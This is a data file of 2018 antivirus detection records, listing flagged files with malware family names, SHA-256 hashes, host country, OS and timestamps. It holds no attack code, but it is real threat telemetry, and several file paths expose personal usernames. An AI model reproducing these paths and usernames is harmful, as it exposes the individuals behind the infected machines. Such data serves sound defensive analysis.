  Row(detection=Row(filename='incontro formatori 3 settembre.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\INCONTRO FORMATORI 3 SETTEMBRE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2066084bdb0eee7a5f2fca3c5eada2ba3983e449a9323185a2ede196849edd6c', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T14:29:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131426-25aa1c7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131426-25AA1C7F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\Shaan\\AppData\\Local\\Temp\\tmp1591868\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:05:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222106-63b9fa33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222106-63B9FA33', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0004757.exe', filepath='d:\\system volume information\\_restore{51d20475-b19b-4e6a-8fc3-a60e80bdc71c}\\rp12\\A0004757.exe', filesize=2496000, name='W32/Neshta.A.#M1.#R1'), hash='34a0062bbc5a1c5768ae76dba40fb972c14f1c5d9ca1e1a0e0eb173baa8cf4b9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:39:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174834-6b8fe82e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5bb5a5ae\\AVSCAN-20181104-174417-4ABC2321\\AVSCAN-20181104-174834-6B8FE82E', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T03:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023828', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023828', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sskinst.exe', filepath='J:\\ML-3470_Print\\DATA\\VECP\\VISTA_64\\sskinst.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T08:52:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='C:\\Windows\\System32\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='7f13fa6ae3dd536739e21e135196870c6f76381a4d27cf1736b896ed8a6ea5dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_4_18_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_4_18_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='9910bb9b6b7c8ff1320875ccf14089b14275ceda5b290e5c904377c901cb5ad9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-050909-33ddcb5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c72d810\\AVSCAN-20181105-050749-2859831F\\AVSCAN-20181105-050909-33DDCB5F', filesize=512000, name='PUA/DownloadAdmin.Gen.#M1.#R1'), hash='27be5500d3635b58d44f0ee16bb732255ab2e2879b38aa44caa5c5ed5672932a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:09:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221910-e795cd96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c952ea04\\AVSCAN-20181104-221859-E5C46A35\\AVSCAN-20181104-221910-E795CD96', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:19:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132057-433cc753', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132057-433CC753', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:20:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T14:00:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160015-9861b853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc4cb44a\\AVSCAN-20181104-153509-F22C8F70\\AVSCAN-20181104-160015-9861B853', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183309-45e31dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_679bd7ad\\AVSCAN-20181104-181420-E392F07C\\AVSCAN-20181104-183309-45E31DD3', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T20:33:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-04T00:39:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160112-b27f6580', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160112-B27F6580', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:01:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0349960.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0349960.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:17:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-04T17:14:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T14:23:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2ec4ee40.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2ec4ee40.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125936-4a036442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125936-4A036442', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000083f', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp0000083f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140223-13adecec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8799aed\\AVSCAN-20181104-140122-0849DC7A\\AVSCAN-20181104-140223-13ADECEC', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dev087.dll', filepath='\\\\?\\C:\\KSuite\\Dll\\DEV087.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='c7d85aae1817b833f66166e40f694b8d8683092c2837525b656ced4c8bc4ab51', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:08:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline='-k localservicenetworkrestricted -p -s wscsvc', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T17:53:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d32a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d32a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000d30c', filepath='C:\\Windows\\Temp\\7a30636c-92b8-42df-aaca-53a67db85549\\tmp00000529\\tmp0000d30c', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='a0b97ebeaac8e79b756d30bd9dfbce4d93f7528e20918e30652d501e4c15b174', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.10.767.8917\\AdAwareService.exe', parentsize=712432, timestamp='2018-11-04T11:07:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000081b', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp0000081b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d80b2789fc619b9b4ebe6101ce2f1e52cfeb1e0c3ea7b0be32b61d9595b7de91', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pe cfp ndoulo.exe', filepath='G:\\PE CFP Ndoulo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu phat hien nhan su bt, pbt.exe', filepath='F:\\ĐẠI HỘI CHI BỘ 17DZ\\PHIEU PHAT HIEN NHAN SU BT, PBT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8414086b5e519879763e582db943d84f2e5185e7252d3bd14c7e84bed824f6b0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182314.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp97\\A0182314.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rada5fe8.tmp.exe', filepath='D:\\Documents and Settings\\X\\Definições locais\\Temp\\radA5FE8.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b015da4b86bdf3766e49e52fbca092f3c6a3c8623867799963493c5b203795c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215053-7d53b087', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215053-7D53B087', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:17:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T11:48:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='corie.vir', filepath='C:\\Program Files (x86)\\kathryn\\corie.VIR', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='792eb813b02b20f688359d09078d12888a37e812ac8b2d7410e54dadf7ca8a02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-04T09:54:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-130208-efd93032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-125704-CC8E852B\\AVSCAN-20181102-130208-EFD93032', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:59:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xkywpdel.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XKYWPDEl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='udvderase.exe', filepath='C:\\Program Files\\Corel\\Corel DVD MovieFactory Lenovo Edition\\DVD MovieFactory\\uDVDErase.exe', filesize=512000, name='W32/Sality.AW.#M1.#R1'), hash='b5679e6a2c88554e624bcf413937cfafcb3030525fb7965d0c8370f5c5a70e1a', metadata=Row(cmdline='invagent.dll,RunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:00:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212312-5e7abc6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_956d8945\\AVSCAN-20181102-210357-9072E9CB\\AVSCAN-20181102-212312-5E7ABC6E', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e6bb1606bfbebfcbe3b64da9c040159fc019a7bd34ff56bc385c995afd07d1e2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:23:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Users\\Schacht\\AppData\\Local\\Smartbar\\Application\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:52Z'), dt=datetime.date(2018, 11, 2)),
